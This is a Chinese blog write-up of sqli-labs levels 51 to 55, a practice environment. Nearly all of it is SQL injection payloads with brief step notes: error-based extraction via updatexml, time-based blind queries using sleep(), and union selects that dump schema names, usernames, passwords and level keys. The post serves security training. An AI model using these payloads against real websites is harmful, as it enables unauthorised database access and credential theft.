51关
这关跟50关一样采用报错来查看
Less-51/?sort=1 and updatexml(1,concat(1,(select database())),1)--+
查表/Less-51/?sort=1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
查列
/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
查询username,password
/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+
52关
这里没有报错没办法只能采用盲注来进行
/Less-52/?sort=1’ and if((ascii(substr(database(),1,1))=115),sleep(6),1) --+
解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e
解析字段名:?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i
获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)--+
53关
解析数据库名称:?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)--+ 第一位是 s
解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e
解析字段名:?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i
54关
从54关开始,关卡开始有了难度,54关仅允许我们输入十次语句,十次语句时候该靶场就会对里面所有的库名,表名,列名进行一个刷新。所以从这关开始,所有的语句仅供参考。
这里爆到表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='r4bsp4sllk'--+ 爆列名
?id=-1%27union%20select%201,group_concat(secret_C4O5),3%20from%20m3xab4chhv--+ 获取key值
查到key把它复制到下面的框里提交就过关了
55关
这里跟上一关一样每个人的表列都不一样这里是 )闭合方式
?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='y3a9eaki2l'--+ 爆到列
然后查询key的值进行提交
?id=-1) union select 1,group_concat(secret_4I3C),3 from y3a9eaki2l--+
标签:name,51,labs,sqli,concat,--+,table,select,schema From: https://blog.csdn.net/2301_81525518/article/details/141713669